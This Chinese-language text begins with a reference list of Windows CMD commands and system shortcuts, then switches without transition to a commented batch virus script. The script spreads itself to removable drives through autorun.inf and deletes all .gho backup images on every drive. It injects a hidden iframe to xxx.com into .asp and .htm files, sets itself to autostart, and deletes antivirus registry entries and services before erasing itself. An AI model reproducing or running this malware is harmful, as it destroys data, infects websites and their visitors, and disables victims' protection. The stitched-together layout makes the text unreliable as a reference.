BREAK 设置或清除扩展式 CTRL+C 检查。
CACLS 显示或修改文件的访问控制列表(ACLs)。
CALL 从另一个批处理程序调用这一个。
CD 显示当前目录的名称或将其更改。
CHCP 显示或设置活动代码页数。
CHDIR 显示当前目录的名称或将其更改。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
CLS 清除屏幕。
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
COMP 比较两个或两套文件的内容。
COMPACT 显示或更改 NTFS 分区上文件的压缩。
CONVERT 将 FAT 卷转换成 NTFS。您不能转换
当前驱动器。
COPY 将至少一个文件复制到另一个位置。
DATE 显示或设置日期。
DEL 删除至少一个文件。
DIR 显示一个目录中的文件和子目录。
DISKCOMP 比较两个软盘的内容。
DISKCOPY 将一个软盘的内容复制到另一个软盘。
DOSKEY 编辑命令行、调用 Windows 命令并创建宏。
ECHO 显示消息，或将命令回显打开或关上。
ENDLOCAL 结束批文件中环境更改的本地化。
ERASE 删除至少一个文件。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
FC 比较两个或两套文件，并显示
不同处。
FIND 在文件中搜索文字字符串。
FINDSTR 在文件中搜索字符串。
FOR 为一套文件中的每个文件运行一个指定的命令。
FORMAT 格式化磁盘，以便跟 Windows 使用。
FTYPE 显示或修改用于文件扩展名关联的文件类型。
GOTO 将 Windows 命令解释程序指向批处理程序
中某个标明的行。
GRAFTABL 启用 Windows 来以图像模式显示
扩展字符集。
HELP 提供 Windows 命令的帮助信息。
IF 执行批处理程序中的条件性处理。
LABEL 创建、更改或删除磁盘的卷标。
MD 创建目录。
MKDIR 创建目录。
MODE 配置系统设备。
MORE 一次显示一个结果屏幕。
MOVE 将文件从一个目录移到另一个目录。
PATH 显示或设置可执行文件的搜索路径。
PAUSE 暂停批文件的处理并显示消息。
POPD 还原 PUSHD 保存的当前目录的上一个值。
PRINT 打印文本文件。
PROMPT 更改 Windows 命令提示符。
PUSHD 保存当前目录，然后对其进行更改。
RD 删除目录。
RECOVER 从有问题的磁盘恢复可读信息。
REM 记录批文件或 CONFIG.SYS 中的注释。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始批文件中环境更改的本地化。
SHIFT 更换批文件中可替换参数的位置。
SORT 对输入进行分类。
START 启动另一个窗口来运行指定的程序或命令。
SUBST 将路径跟一个驱动器号关联。
TIME 显示或设置系统时间。
TITLE 设置 CMD.EXE 会话的窗口标题。
TREE 以图形模式显示驱动器或路径的目录结构。
TYPE 显示文本文件的内容。
VER 显示 Windows 版本。
VERIFY 告诉 Windows 是否验证文件是否已正确
写入磁盘。
VOL 显示磁盘卷标和序列号。
XCOPY 复制文件和目录树。

appwiz.cpl————添加删除程序

control userpasswords2——–用户帐户设置

cleanmgr——-垃圾整理

CMD————–命令提示符可以当作是 Windows 的一个附件，Ping，Convert 这些不能在图形环境下 使用的功能要借助它来完成。

cmd——jview察看Java虚拟机版本。

command.com——调用的则是系统内置的 NTVDM，一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境，和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时，实际上也 是自动转移到 NTVDM虚拟机下，和 CMD 本身没什么关系。

calc———–启动计算器

chkdsk.exe—–Chkdsk磁盘检查

compmgmt.msc—计算机管理

conf———–启动 netmeeting

control userpasswords2—–User Account 权限设置

devmgmt.msc— 设备管理器

diskmgmt.msc—磁盘管理实用程序

dfrg.msc——-磁盘碎片整理程序

drwtsn32—— 系统医生

dvdplay——–启动Media Player

dxdiag———–DirectX Diagnostic Tool

gpedit.msc——-组策略编辑器

gpupdate /target:computer /force 强制刷新组策略

eventvwr.exe—–事件查看器

explorer——-打开资源管理器

logoff———注销命令

lusrmgr.msc—-本机用户和组

msinfo32———系统信息

msconfig———系统配置实用程序

net start (servicename)—-启动该服务

net stop (servicename)—–停止该服务

notepad——–打开记事本

nusrmgr.cpl——-同control userpasswords，打开用户帐户控制面板

Nslookup——-IP地址侦测器

oobe/msoobe /a—-检查XP是否激活

perfmon.msc—-计算机性能监测程序

progman——–程序管理器

regedit———-注册表编辑器

regedt32——-注册表编辑器

regsvr32 /u *.dll—-停止dll文件运行

route print——查看路由表

rononce -p —-15秒关机

rsop.msc——-组策略结果集

rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen—-启动一个空白的Windows 图片和传真查看器

secpol.msc——–本地安全策略

services.msc—本地服务设置

sfc /scannow—–启动系统文件检查器

sndrec32——-录音机

taskmgr—–任务管理器（适用于2000／xp／2003）

tsshutdn——-60秒倒计时关机命令

winchat——–XP自带局域网聊天

winmsd———系统信息

winver—–显示About Windows 窗口

wupdmgr———–Windows Update

REM 向可移动硬盘内复制病毒
copy bat.exe %yidong%\ /y
//注意yidong由于已经是一个环境变量以后应用需要用成对的%%括起来。 /y 参数表示不提示确认。
copy muma.com %yidong%\ /y
attrib +s +h %yidong%\muma.com
attrib +s +h %yidong%\bat.exe
if exist %yidong%\autorun.inf (
attrib -a -s -h %yidong%\autorun.inf
del %yidong%\autorun.inf)
//如果存在autorun.inf则执行括号里面的内容。
echo [AutoRun]>%yidong%\Autorun.inf
echo shell\Open\command=bat.exe>>%yidong%\Autorun.inf
echo shell\Open=打开(^&O)
echo shell\explore=资源管理器(^&X)>>%yidong%\Autorun.inf
//^符号是转义字符，表示后面的&符号失去连接意义。这里加&是加粗显示的用途。
echo shell\explorer\command=bat.exe>>%yidong%\Autorun.inf
attrib +s +h %yidong%\Autorun.inf
del %systemroot%temp.txt /q /f
//删除用于存放临时信息的文件
:next
REM 循环遍历磁盘，自动删除*.gho文件
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.gho’) do del “%%b” /q /f
))
//这里是对各个磁盘的gho文件进行查找，一旦发现即删除

REM 循环遍历磁盘，自动对ASP，ASPX插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.asp’) do (echo ^<iframe src=”http://www.xxx.com” width=0 height=0 border=0^>^</iframe^>>> “%%b”)
))
REM 循环遍历磁盘，自动对HTM，HTML插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul (
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.htm’) do (echo ^<iframe src=”http://www.xxx.com” width=0 height=0 border=0^>^</iframe^>>> “%%b”)
))
REM 修改注册表不显示隐藏文件
REG ADD “HKEY_LOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL” /v “CheckedValue” /t REG_DWORD /d 0 /f
REM 添加注册表自启动项
REG ADD “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v type /t REG_EXPAND_SZ /d “c:\Windows\system32\bat.exe” /f
//REG ADD是对注册表进行添加操作， /v后面跟项的名称 /t后面跟数据类型 /f表示强制操作不提示
REM 删除安全软件在注册表中的键值
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RavTask /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Network Associates Error RePorting Service” /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStartEXE /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f
REM 删除以下服务
sc delete navapsvc
sc delete wscsvc
sc delete KPfwSvc
sc delete SNDSrvc
sc delete ccProxy
sc delete ccEvtMgr
sc delete ccSetMgr
sc delete SPBBCSvc
sc delete Symantec Core LC
sc delete NPFMntor
sc delete MskService
sc delete FireSvc
del muma.com
del bat.vbs
del %O
// %O 是删除自身的意思